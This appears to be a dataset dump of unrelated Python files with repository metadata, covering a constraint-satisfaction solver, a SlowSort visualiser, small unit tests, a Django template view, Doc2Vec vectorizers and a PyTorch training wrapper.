for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
backtracking_search.num = 0
def min_conflicts(csp, max_steps=50):
csp.current = current = {}
for var in csp.variables:
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
for _ in range(max_steps):
conflicted = csp.conflicted_vars(current)
if not conflicted:
return current
var = random.choice(conflicted)
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
return None
min_conflicts.num = 0
def min_conflicts_value(csp, var, current):
min_conflicts_value.num +=1
return argmin_random_tie(csp.domains[var], key=lambda val: csp.nconflicts(var, val, current))
min_conflicts_value.num = 0
neighdict={}
for i in variables:
neighdict[i]=set()
def FC(csp, var, value, assignment, removals):
csp.support_pruning()
for B in csp.neighbors[var]:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
if B in assignment:
neighdict[var].add(B)
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
if var<B:
cDict[var][B][2]+=1
else:
cDict[B][var][2]+=1
return False
return True
def fc_cbj(csp, select_unassigned_variable=domwdeg,
order_domain_values=unordered_domain_values, inference=FC):
def backtrack(assignment,myvar=None):
fc_cbj.num+=1
if len(assignment) == len(csp.variables):
return assignment
if myvar==None:
var = select_unassigned_variable(assignment, csp)
else:
var=myvar
for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
if neighdict[var]:
proo=max(neighdict[var])
neighdict[var].remove(proo)
neighdict[proo].update(neighdict[var])
neighdict[var].clear()
backtrack(assignment,proo)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
fc_cbj.num =0
mycsp = CSP(variables,domains,neighbors,constraints)
global start_time
print("\n\nRunning with: forward_checking\n")
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,forward_checking):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: MAC\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,mac):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: min_conflict\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if min_conflicts(mycsp):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",min_conflicts_value.num)
print("\n\nRunning with: FC-CBJ\n")
start_time = time.time()
constraints.num=0
if fc_cbj(mycsp,domwdeg,unordered_domain_values,FC):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",fc_cbj.num)
| true
| true
|
1c4466253e969a18fb0c6d7010f4d599e9cba409
| 598
|
py
|
Python
|
aulas/aula34/pessoa.py
|
Biguelini/Curso-Python-3
|
0b5df350f5901262927b11b6f2b9b215176808ff
|
[
"MIT"
] | null | null | null |
aulas/aula34/pessoa.py
|
Biguelini/Curso-Python-3
|
0b5df350f5901262927b11b6f2b9b215176808ff
|
[
"MIT"
] | null | null | null |
aulas/aula34/pessoa.py
|
Biguelini/Curso-Python-3
|
0b5df350f5901262927b11b6f2b9b215176808ff
|
[
"MIT"
] | null | null | null |
from random import randint
class Pessoa:
ano_atual = 2021
def __init__(self, nome,idade):
self.nome = nome
self.idade = idade
def get_ano_nascimento(self):
print(self.ano_atual - self.idade)
@classmethod
def por_ano_nascimento(cls, nome, ano_nascimento):
idade = cls.ano_atual - ano_nascimento
return cls(nome, idade)
@staticmethod
def gerar_id():
rand = randint(10000, 19999)
return rand
p1 = Pessoa.por_ano_nascimento('João', 2005)
print(p1.idade)
p1.get_ano_nascimento()
print(p1.gerar_id())
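# Illustrative note (values assume ano_atual == 2021): the classmethod is an
# alternative constructor, e.g. Pessoa.por_ano_nascimento('Maria', 1990).idade
# evaluates to 31; gerar_id() returns a random five-digit id in [10000, 19999].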
| 26
| 54
| 0.645485
|
from random import randint
class Pessoa:
ano_atual = 2021
def __init__(self, nome,idade):
self.nome = nome
self.idade = idade
def get_ano_nascimento(self):
print(self.ano_atual - self.idade)
@classmethod
def por_ano_nascimento(cls, nome, ano_nascimento):
idade = cls.ano_atual - ano_nascimento
return cls(nome, idade)
@staticmethod
def gerar_id():
rand = randint(10000, 19999)
return rand
p1 = Pessoa.por_ano_nascimento('João', 2005)
print(p1.idade)
p1.get_ano_nascimento()
print(p1.gerar_id())
| true
| true
|
1c4466dc29d29af161d0a6e91e4f0ea8538ec7f8
| 649
|
py
|
Python
|
tests/Test_Deque.py
|
p-christ/Deep-Reinforcement-Learning-PyTorch-Algorithms
|
135d3e2e06bbde2868047d738e3fc2d73fd8cc93
|
[
"MIT"
] | 4,461
|
2019-01-13T02:06:25.000Z
|
2022-03-31T11:50:11.000Z
|
tests/Test_Deque.py
|
p-christ/Deep-Reinforcement-Learning-PyTorch-Algorithms
|
135d3e2e06bbde2868047d738e3fc2d73fd8cc93
|
[
"MIT"
] | 66
|
2019-01-17T10:36:21.000Z
|
2022-02-22T21:29:30.000Z
|
tests/Test_Deque.py
|
p-christ/Deep-Reinforcement-Learning-PyTorch-Algorithms
|
135d3e2e06bbde2868047d738e3fc2d73fd8cc93
|
[
"MIT"
] | 1,051
|
2019-01-13T17:30:49.000Z
|
2022-03-31T03:33:00.000Z
|
from utilities.data_structures.Deque import Deque
from utilities.data_structures.Node import Node
def test_Deque_initialisation():
deque = Deque(2, 1)
assert all(deque.deque == [Node(0, (None,)), Node(0, (None,))])
def test_Deque_adding_elements():
deque = Deque(2, 1)
deque.add_element_to_deque(3, 5)
deque.add_element_to_deque(2, 4)
assert all(deque.deque == [Node(3, 5), Node(2, 4)])
deque.add_element_to_deque(1, 2)
assert all(deque.deque == [Node(1, 2), Node(2, 4)])
deque.add_element_to_deque(-100, 0)
deque.add_element_to_deque(0, 0)
assert all(deque.deque == [Node(0, 0), Node(-100, 0)])
| 25.96
| 67
| 0.671803
|
from utilities.data_structures.Deque import Deque
from utilities.data_structures.Node import Node
def test_Deque_initialisation():
deque = Deque(2, 1)
assert all(deque.deque == [Node(0, (None,)), Node(0, (None,))])
def test_Deque_adding_elements():
deque = Deque(2, 1)
deque.add_element_to_deque(3, 5)
deque.add_element_to_deque(2, 4)
assert all(deque.deque == [Node(3, 5), Node(2, 4)])
deque.add_element_to_deque(1, 2)
assert all(deque.deque == [Node(1, 2), Node(2, 4)])
deque.add_element_to_deque(-100, 0)
deque.add_element_to_deque(0, 0)
assert all(deque.deque == [Node(0, 0), Node(-100, 0)])
| true
| true
|
1c4467414998af56816a2597349b7bc99489b16f
| 899
|
py
|
Python
|
tests/virtualenv_test.py
|
lsst-sqre/neophile
|
0923bd5b58851af13c09f73a05b1a2882434b437
|
[
"MIT"
] | null | null | null |
tests/virtualenv_test.py
|
lsst-sqre/neophile
|
0923bd5b58851af13c09f73a05b1a2882434b437
|
[
"MIT"
] | 23
|
2020-07-17T23:27:44.000Z
|
2022-03-21T19:39:19.000Z
|
tests/virtualenv_test.py
|
lsst-sqre/neophile
|
0923bd5b58851af13c09f73a05b1a2882434b437
|
[
"MIT"
] | null | null | null |
"""Tests for the VirtualEnv class."""
from __future__ import annotations
from typing import TYPE_CHECKING
from neophile.virtualenv import VirtualEnv
if TYPE_CHECKING:
from pathlib import Path
def test_provided_env(tmp_path: Path) -> None:
"""Test virtualenv execution with an env parameter."""
venv_path = tmp_path / "venv"
venv = VirtualEnv(venv_path)
result = venv.run(
["/bin/sh", "-c", "echo $FOO"],
capture_output=True,
text=True,
env={"FOO": "testing"},
)
assert result.stdout == "testing\n"
assert (venv_path / "bin" / "activate").exists()
def test_preexisting(tmp_path: Path) -> None:
"""If the directory exists, create should silently do nothing."""
venv_path = tmp_path / "venv"
venv_path.mkdir()
venv = VirtualEnv(venv_path)
venv.create()
assert not (venv_path / "bin" / "activate").exists()
| 26.441176
| 69
| 0.657397
|
from __future__ import annotations
from typing import TYPE_CHECKING
from neophile.virtualenv import VirtualEnv
if TYPE_CHECKING:
from pathlib import Path
def test_provided_env(tmp_path: Path) -> None:
venv_path = tmp_path / "venv"
venv = VirtualEnv(venv_path)
result = venv.run(
["/bin/sh", "-c", "echo $FOO"],
capture_output=True,
text=True,
env={"FOO": "testing"},
)
assert result.stdout == "testing\n"
assert (venv_path / "bin" / "activate").exists()
def test_preexisting(tmp_path: Path) -> None:
venv_path = tmp_path / "venv"
venv_path.mkdir()
venv = VirtualEnv(venv_path)
venv.create()
assert not (venv_path / "bin" / "activate").exists()
| true
| true
|
1c4468ba33418923dca05c70f0096dda2c4a0a8d
| 1,953
|
py
|
Python
|
src/SlowSort.py
|
LC-John/Sorting
|
c34ab338a910a12def0db426495a97b5170b971b
|
[
"MIT"
] | 6
|
2018-12-19T02:33:10.000Z
|
2020-10-31T07:59:37.000Z
|
src/SlowSort.py
|
LC-John/Sorting
|
c34ab338a910a12def0db426495a97b5170b971b
|
[
"MIT"
] | null | null | null |
src/SlowSort.py
|
LC-John/Sorting
|
c34ab338a910a12def0db426495a97b5170b971b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 23 13:55:02 2018
@author: zhanghuangzhao
"""
import numpy
import copy
import os, shutil
import imageio
import matplotlib.pyplot as plt
size = 8
arr = None
def SlowSort(a, idx_begin, idx_end, reverse=False):
a = copy.deepcopy(a)
proc = []
if idx_begin >= idx_end:
return a, proc
idx_mid = int(numpy.floor((idx_begin+idx_end)/2))
a, tmp_proc = SlowSort(a, idx_begin, idx_mid, reverse)
proc += tmp_proc
a, tmp_proc = SlowSort(a, idx_mid+1, idx_end, reverse)
proc += tmp_proc
if (reverse and a[idx_mid] > a[idx_end]) \
or ((not reverse) and a[idx_mid] < a[idx_end]):
(a[idx_mid], a[idx_end]) = (a[idx_end], a[idx_mid])
proc.append(copy.deepcopy(a))
a, tmp_proc = SlowSort(a, idx_begin, idx_end-1, reverse)
proc += tmp_proc
return a, proc
if __name__ == "__main__":
arr = numpy.random.uniform(0, 1, size=size)
arr = arr.tolist()
res, proc = SlowSort(arr, 0, len(arr)-1)
tmp_dir = "../images/tmp"
img_buf = []
if os.path.isdir(tmp_dir):
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
for i in range(len(proc)):
plt.cla()
plt.bar(list(range(len(proc[i]))),
height=proc[i],
width=0.5)
plt.xlim([-1, len(arr)])
plt.ylim([-0.01, 1.01])
plt.savefig(os.path.join(tmp_dir, ("%d.jpg" % i)))
img_buf.append(imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % i))))
print ("\r%d / %d" % (i+1, len(proc)), end="")
print("\ndone!")
plt.cla()
init = [imageio.imread(os.path.join(tmp_dir, "0.jpg")) for i in range(10)]
final = [imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % (len(proc)-1)))) for i in range(10)]
img_buf = init + img_buf + final
shutil.rmtree(tmp_dir)
imageio.mimsave("../images/SlowSort.gif", img_buf)
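# Behaviour sketch (no GIF rendering; follows the code above): with
# reverse=False the comparison is inverted relative to textbook slowsort,
# so the result is sorted in descending order, e.g.
#   a, steps = SlowSort([0.2, 0.5, 0.1], 0, 2)
#   a == [0.5, 0.2, 0.1]  # steps holds one snapshot per swap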
| 27.125
| 98
| 0.578597
|
import numpy
import copy
import os, shutil
import imageio
import matplotlib.pyplot as plt
size = 8
arr = None
def SlowSort(a, idx_begin, idx_end, reverse=False):
a = copy.deepcopy(a)
proc = []
if idx_begin >= idx_end:
return a, proc
idx_mid = int(numpy.floor((idx_begin+idx_end)/2))
a, tmp_proc = SlowSort(a, idx_begin, idx_mid, reverse)
proc += tmp_proc
a, tmp_proc = SlowSort(a, idx_mid+1, idx_end, reverse)
proc += tmp_proc
if (reverse and a[idx_mid] > a[idx_end]) \
or ((not reverse) and a[idx_mid] < a[idx_end]):
(a[idx_mid], a[idx_end]) = (a[idx_end], a[idx_mid])
proc.append(copy.deepcopy(a))
a, tmp_proc = SlowSort(a, idx_begin, idx_end-1, reverse)
proc += tmp_proc
return a, proc
if __name__ == "__main__":
arr = numpy.random.uniform(0, 1, size=size)
arr = arr.tolist()
res, proc = SlowSort(arr, 0, len(arr)-1)
tmp_dir = "../images/tmp"
img_buf = []
if os.path.isdir(tmp_dir):
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
for i in range(len(proc)):
plt.cla()
plt.bar(list(range(len(proc[i]))),
height=proc[i],
width=0.5)
plt.xlim([-1, len(arr)])
plt.ylim([-0.01, 1.01])
plt.savefig(os.path.join(tmp_dir, ("%d.jpg" % i)))
img_buf.append(imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % i))))
print ("\r%d / %d" % (i+1, len(proc)), end="")
print("\ndone!")
plt.cla()
init = [imageio.imread(os.path.join(tmp_dir, "0.jpg")) for i in range(10)]
final = [imageio.imread(os.path.join(tmp_dir, ("%d.jpg" % (len(proc)-1)))) for i in range(10)]
img_buf = init + img_buf + final
shutil.rmtree(tmp_dir)
imageio.mimsave("../images/SlowSort.gif", img_buf)
| true
| true
|
1c44692d32c53253146a108f2c5bcf7a2cb3f282
| 1,112
|
py
|
Python
|
website/backend/webserver/api/views/templates.py
|
ModelFlow/modelflow
|
c2b720b2da8bb17462baff5c00bbe942644474b0
|
[
"MIT"
] | 6
|
2020-07-28T19:58:28.000Z
|
2021-05-01T18:51:37.000Z
|
website/backend/webserver/api/views/templates.py
|
ModelFlow/modelflow
|
c2b720b2da8bb17462baff5c00bbe942644474b0
|
[
"MIT"
] | 81
|
2020-07-30T07:08:10.000Z
|
2021-07-28T02:17:43.000Z
|
website/backend/webserver/api/views/templates.py
|
ModelFlow/modelflow
|
c2b720b2da8bb17462baff5c00bbe942644474b0
|
[
"MIT"
] | null | null | null |
from django.http import JsonResponse
from ..models import Template, Scenario
# NOTE: I think this can be deleted and be replaced by django rest framework
def get_templates_metadata(request):
"""
Get the templates for a project from a lookup on the scenario id. This
is because we only have access to the scenario id param from the sim page.
"""
scenario_id = request.GET.get('scenario_id', None)
if not scenario_id:
return JsonResponse({'error': 'Need to provide scenario_id'})
scenario = Scenario.objects.filter(id=int(scenario_id)).first()
if scenario is None:
return JsonResponse({'error': f'Could not find scenario with id {scenario_id}'})
project = scenario.project
if project is None:
return JsonResponse({'error': 'Project for scenario was none'})
templates = []
show_hidden = int(request.GET.get('show_hidden', 0)) == 1
for template in Template.objects.filter(project=project, is_hidden=show_hidden):
templates.append(dict(name=template.name, id=template.id))
return JsonResponse({'templates': templates})
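# Illustrative request sketch (hypothetical ids and URL prefix):
#   GET /api/templates/?scenario_id=3&show_hidden=0
#   -> {"templates": [{"name": "Baseline", "id": 7}, ...]}
# Note that show_hidden=1 matches is_hidden for equality, so it returns only
# hidden templates rather than hidden plus visible ones.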
| 39.714286
| 88
| 0.705935
|
from django.http import JsonResponse
from ..models import Template, Scenario
def get_templates_metadata(request):
scenario_id = request.GET.get('scenario_id', None)
if not scenario_id:
return JsonResponse({'error': 'Need to provide scenario_id'})
scenario = Scenario.objects.filter(id=int(scenario_id)).first()
if scenario is None:
return JsonResponse({'error': f'Could not find scenario with id {scenario_id}'})
project = scenario.project
if project is None:
return JsonResponse({'error': 'Project for scenario was none'})
templates = []
show_hidden = int(request.GET.get('show_hidden', 0)) == 1
for template in Template.objects.filter(project=project, is_hidden=show_hidden):
templates.append(dict(name=template.name, id=template.id))
return JsonResponse({'templates': templates})
| true
| true
|
1c44698c1a36059851b7d59d1a9db5fef3c470ba
| 294
|
py
|
Python
|
body/testbody.py
|
sherry0429/TornadoLayer
|
c58f3bbd9f409fd8506f30d3002499b294ff7303
|
[
"Apache-2.0"
] | null | null | null |
body/testbody.py
|
sherry0429/TornadoLayer
|
c58f3bbd9f409fd8506f30d3002499b294ff7303
|
[
"Apache-2.0"
] | null | null | null |
body/testbody.py
|
sherry0429/TornadoLayer
|
c58f3bbd9f409fd8506f30d3002499b294ff7303
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 tianyou pan <sherry0429 at SOAPython>
"""
from tornado_layer import BaseHttpBody
class TestMessageBody(BaseHttpBody):
data = "i am test data"
def __init__(self, url, method):
super(TestMessageBody, self).__init__(url, method)
| 19.6
| 58
| 0.687075
|
from tornado_layer import BaseHttpBody
class TestMessageBody(BaseHttpBody):
data = "i am test data"
def __init__(self, url, method):
super(TestMessageBody, self).__init__(url, method)
| true
| true
|
1c446a89bba32565bdf40122d1a561b1a162328f
| 438
|
py
|
Python
|
molsysmt/tools/mdanalysis_Universe/to_molsysmt_Trajectory.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/mdanalysis_Universe/to_molsysmt_Trajectory.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/mdanalysis_Universe/to_molsysmt_Trajectory.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
def to_molsysmt_Trajectory(item, selection='all', frame_indices='all', syntaxis='MolSysMT'):
from molsysmt.tools.mdanalysis_Universe import is_mdanalysis_Universe
from molsysmt.basic import convert
if not is_mdanalysis_Universe(item):
raise ValueError
tmp_item = convert(item, to_form='molsysmt.Trajectory', selection=selection,
frame_indices=frame_indices, syntaxis=syntaxis)
return tmp_item
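# Illustrative sketch (hypothetical MDAnalysis Universe; arguments follow the
# signature above):
#   traj = to_molsysmt_Trajectory(universe, selection='all', frame_indices='all')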
| 31.285714
| 92
| 0.755708
|
def to_molsysmt_Trajectory(item, selection='all', frame_indices='all', syntaxis='MolSysMT'):
from molsysmt.tools.mdanalysis_Universe import is_mdanalysis_Universe
from molsysmt.basic import convert
if not is_mdanalysis_Universe(item):
raise ValueError
tmp_item = convert(item, to_form='molsysmt.Trajectory', selection=selection,
frame_indices=frame_indices, syntaxis=syntaxis)
return tmp_item
| true
| true
|
1c446b141031895ba08007681fefd9346f8b0dac
| 999
|
py
|
Python
|
deployment/util_code/doc2vec_vectorizer.py
|
XC-Li/FiscalNote_Project
|
a8343f22156f619f2c8fe9102e6df684d1b4c97f
|
[
"MIT"
] | 1
|
2019-08-26T01:48:02.000Z
|
2019-08-26T01:48:02.000Z
|
deployment/util_code/doc2vec_vectorizer.py
|
XC-Li/FiscalNote_Project
|
a8343f22156f619f2c8fe9102e6df684d1b4c97f
|
[
"MIT"
] | null | null | null |
deployment/util_code/doc2vec_vectorizer.py
|
XC-Li/FiscalNote_Project
|
a8343f22156f619f2c8fe9102e6df684d1b4c97f
|
[
"MIT"
] | 1
|
2021-02-12T14:57:41.000Z
|
2021-02-12T14:57:41.000Z
|
"""By: Xiaochi (George) Li: github.com/XC-Li"""
from gensim.models.doc2vec import Doc2Vec
import numpy as np
from scipy.sparse import hstack as sparse_hstack
class D2V(object):
def __init__(self, file):
self.model = Doc2Vec.load(file)
def fit(self, X):
pass
def transform(self, X):
temp = []
for speech in X:
temp.append(self.model.infer_vector(speech))
return np.vstack(temp)
class StackedD2V(object):
def __init__(self, file, vectorizer):
self.d2v = Doc2Vec.load(file)
self.vectorizer = vectorizer
def fit(self, X):
self.vectorizer.fit(X)
def d2v_transform(self, X):
temp = []
for speech in X:
temp.append(self.d2v.infer_vector(speech))
return np.vstack(temp)
def transform(self, X):
bow = self.vectorizer.transform(X)
d2v_emb = self.d2v_transform(X)
combined_emb = sparse_hstack((bow, d2v_emb))
return combined_emb
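# Illustrative usage sketch (hypothetical model file and corpus; infer_vector
# expects pre-tokenized word lists):
#   d2v = D2V('doc2vec.model')
#   X = [['budget', 'hearing'], ['tax', 'reform', 'bill']]
#   emb = d2v.transform(X)  # numpy array of shape (2, model.vector_size)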
| 24.975
| 56
| 0.620621
|
from gensim.models.doc2vec import Doc2Vec
import numpy as np
from scipy.sparse import hstack as sparse_hstack
class D2V(object):
def __init__(self, file):
self.model = Doc2Vec.load(file)
def fit(self, X):
pass
def transform(self, X):
temp = []
for speech in X:
temp.append(self.model.infer_vector(speech))
return np.vstack(temp)
class StackedD2V(object):
def __init__(self, file, vectorizer):
self.d2v = Doc2Vec.load(file)
self.vectorizer = vectorizer
def fit(self, X):
self.vectorizer.fit(X)
def d2v_transform(self, X):
temp = []
for speech in X:
temp.append(self.d2v.infer_vector(speech))
return np.vstack(temp)
def transform(self, X):
bow = self.vectorizer.transform(X)
d2v_emb = self.d2v_transform(X)
combined_emb = sparse_hstack((bow, d2v_emb))
return combined_emb
| true
| true
|
1c446ba5c4b308ca1c5d968bc183ff8711ec453b
| 323
|
py
|
Python
|
appengine/predator/frontend/handlers/fracas_result_feedback.py
|
mcgreevy/chromium-infra
|
09064105713603f7bf75c772e8354800a1bfa256
|
[
"BSD-3-Clause"
] | 1
|
2018-01-02T05:47:07.000Z
|
2018-01-02T05:47:07.000Z
|
appengine/predator/frontend/handlers/fracas_result_feedback.py
|
mcgreevy/chromium-infra
|
09064105713603f7bf75c772e8354800a1bfa256
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/predator/frontend/handlers/fracas_result_feedback.py
|
mcgreevy/chromium-infra
|
09064105713603f7bf75c772e8354800a1bfa256
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from frontend.handlers.result_feedback import ResultFeedback
class FracasResultFeedback(ResultFeedback):
@property
def client(self):
return 'fracas'
| 24.846154
| 72
| 0.780186
|
from frontend.handlers.result_feedback import ResultFeedback
class FracasResultFeedback(ResultFeedback):
@property
def client(self):
return 'fracas'
| true
| true
|
1c446c08fda3e987130a4789309ad6cc490f6da8
| 3,132
|
py
|
Python
|
modeling/net.py
|
cpratim/DALI-Data-Challenge
|
ad0d6d048abb240dd2316ff70590606bd2d8c44f
|
[
"MIT"
] | null | null | null |
modeling/net.py
|
cpratim/DALI-Data-Challenge
|
ad0d6d048abb240dd2316ff70590606bd2d8c44f
|
[
"MIT"
] | null | null | null |
modeling/net.py
|
cpratim/DALI-Data-Challenge
|
ad0d6d048abb240dd2316ff70590606bd2d8c44f
|
[
"MIT"
] | null | null | null |
import os
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from tqdm import tqdm
import numpy as np
from sklearn.preprocessing import (
StandardScaler,
MinMaxScaler,
)
from sklearn.pipeline import Pipeline
from gplearn.genetic import SymbolicTransformer
import pickle
sk_pipeline = Pipeline(
[
('scaler', StandardScaler()),
#('transformer', SymbolicTransformer(n_jobs=-1))
]
)
def correlation(x, y):
return np.corrcoef(x, y)[0, 1]
class LinearNet(nn.Module):
def __init__(self, n_feat, n_out= 1):
super().__init__()
self.conv1 = nn.Conv1d(n_feat, 15, 1)
self.pool1 = nn.MaxPool1d(1)
self.flatten = nn.Flatten()
self.relu1 = nn.ReLU()
self.linear1 = nn.Linear(15, 5)
self.out = nn.Linear(5, n_out)
def forward(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.flatten(x)
x = self.relu1(x)
x = self.linear1(x)
x = self.out(x)
return x
def train(
model,
X, y,
epochs=50000,
batch_size=None,
learning_rate=1e-5,
score_func=correlation,
optimizer=optim.Adam,
loss_func=nn.MSELoss(),
):
y_comp = y.detach().cpu().numpy().reshape(-1,)
optimizer = optimizer(model.parameters(), lr=learning_rate)
    # integer division avoids needing math.floor (which was never imported)
    splits = len(X) // batch_size if batch_size is not None else 1
X_batches = torch.tensor_split(X, splits)
y_batches = torch.tensor_split(y, splits)
bar = tqdm(range(epochs))
for epoch in bar:
for x, y in zip(X_batches, y_batches):
y_pred = model(x)
loss = loss_func(y_pred, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
y_pred_comp = model(X).detach().cpu().numpy().reshape(-1,)
score = score_func(y_pred_comp, y_comp)
bar.set_description(f"Score: {round(score, 5)}")
return model
class ModelWrapper(object):
def __init__(self, model = LinearNet, train_func = train, feature_pipeline = sk_pipeline, **kwargs):
self.model = model(**kwargs)
self.train_func = train_func
self.feature_pipeline = feature_pipeline
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def fit(self, X, y, **kwargs):
X = self.feature_pipeline.fit_transform(X, y)
y = y.reshape(-1, 1)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
y = torch.Tensor(y)
X = X.to(self.device)
y = y.to(self.device)
self.model = self.model.to(self.device)
self.model = self.train_func(self.model, X, y, **kwargs)
def detach(self, y):
return y.detach().cpu().numpy().reshape(-1,)
def predict(self, X):
X = self.feature_pipeline.transform(X)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
X = X.to(self.device)
y = self.model(X)
return self.detach(y)
def save(self, dir):
with open(dir, 'wb') as f:
pickle.dump(self, f)
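A minimal end-to-end sketch of ModelWrapper on random data (the shapes, epoch count and output file name are illustrative assumptions, not from the original project):

import numpy as np

X = np.random.rand(128, 10)        # 128 samples, 10 features
y = np.random.rand(128)
wrapper = ModelWrapper(n_feat=10)  # extra kwargs are forwarded to LinearNet
wrapper.fit(X, y, epochs=100, learning_rate=1e-3)
preds = wrapper.predict(X)         # 1-D numpy array of predictions
wrapper.save('model.pkl')          # hypothetical output path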
| 25.884298
| 104
| 0.590996
|
import os
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from tqdm import tqdm
import numpy as np
from sklearn.preprocessing import (
StandardScaler,
MinMaxScaler,
)
from sklearn.pipeline import Pipeline
from gplearn.genetic import SymbolicTransformer
import pickle
sk_pipeline = Pipeline(
[
('scaler', StandardScaler()),
]
)
def correlation(x, y):
return np.corrcoef(x, y)[0, 1]
class LinearNet(nn.Module):
def __init__(self, n_feat, n_out= 1):
super().__init__()
self.conv1 = nn.Conv1d(n_feat, 15, 1)
self.pool1 = nn.MaxPool1d(1)
self.flatten = nn.Flatten()
self.relu1 = nn.ReLU()
self.linear1 = nn.Linear(15, 5)
self.out = nn.Linear(5, n_out)
def forward(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.flatten(x)
x = self.relu1(x)
x = self.linear1(x)
x = self.out(x)
return x
def train(
model,
X, y,
epochs=50000,
batch_size=None,
learning_rate=1e-5,
score_func=correlation,
optimizer=optim.Adam,
loss_func=nn.MSELoss(),
):
y_comp = y.detach().cpu().numpy().reshape(-1,)
optimizer = optimizer(model.parameters(), lr=learning_rate)
    splits = len(X) // batch_size if batch_size is not None else 1
X_batches = torch.tensor_split(X, splits)
y_batches = torch.tensor_split(y, splits)
bar = tqdm(range(epochs))
for epoch in bar:
for x, y in zip(X_batches, y_batches):
y_pred = model(x)
loss = loss_func(y_pred, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
y_pred_comp = model(X).detach().cpu().numpy().reshape(-1,)
score = score_func(y_pred_comp, y_comp)
bar.set_description(f"Score: {round(score, 5)}")
return model
class ModelWrapper(object):
def __init__(self, model = LinearNet, train_func = train, feature_pipeline = sk_pipeline, **kwargs):
self.model = model(**kwargs)
self.train_func = train_func
self.feature_pipeline = feature_pipeline
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def fit(self, X, y, **kwargs):
X = self.feature_pipeline.fit_transform(X, y)
y = y.reshape(-1, 1)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
y = torch.Tensor(y)
X = X.to(self.device)
y = y.to(self.device)
self.model = self.model.to(self.device)
self.model = self.train_func(self.model, X, y, **kwargs)
def detach(self, y):
return y.detach().cpu().numpy().reshape(-1,)
def predict(self, X):
X = self.feature_pipeline.transform(X)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
X = X.to(self.device)
y = self.model(X)
return self.detach(y)
def save(self, dir):
with open(dir, 'wb') as f:
pickle.dump(self, f)
| true
| true
|
1c446c1a6bc3489b11c669948577e7a3ca162f01
| 222
|
py
|
Python
|
crispy_shifty/__init__.py
|
proleu/crispy_shifty
|
87393581a67cbeda287f858a8860145b6ccb5768
|
[
"MIT"
] | 4
|
2022-01-11T23:40:12.000Z
|
2022-03-03T00:42:57.000Z
|
crispy_shifty/__init__.py
|
proleu/crispy_shifty
|
87393581a67cbeda287f858a8860145b6ccb5768
|
[
"MIT"
] | null | null | null |
crispy_shifty/__init__.py
|
proleu/crispy_shifty
|
87393581a67cbeda287f858a8860145b6ccb5768
|
[
"MIT"
] | null | null | null |
# TODO smart sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) type thing?
# import sys
# from pathlib import Path
#
# # As PosixPath
# sys.path.append(Path(__file__).parent ) #.parent.parent) might be better
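# A minimal sketch of the first idea above (kept commented out, like the rest
# of this stub; the inserted path is this file's own directory):
# import os
# import sys
# sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))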
| 31.714286
| 87
| 0.734234
| true
| true
|
|
1c446c2f5aac664a71d64849454ca09648c92f8f
| 776
|
py
|
Python
|
test/dao/test_userInfoDao.py
|
clarkchen/tiflask
|
7dee6d2de85b9b15eb233d2e4dfcda218ab4c65b
|
[
"Apache-2.0"
] | null | null | null |
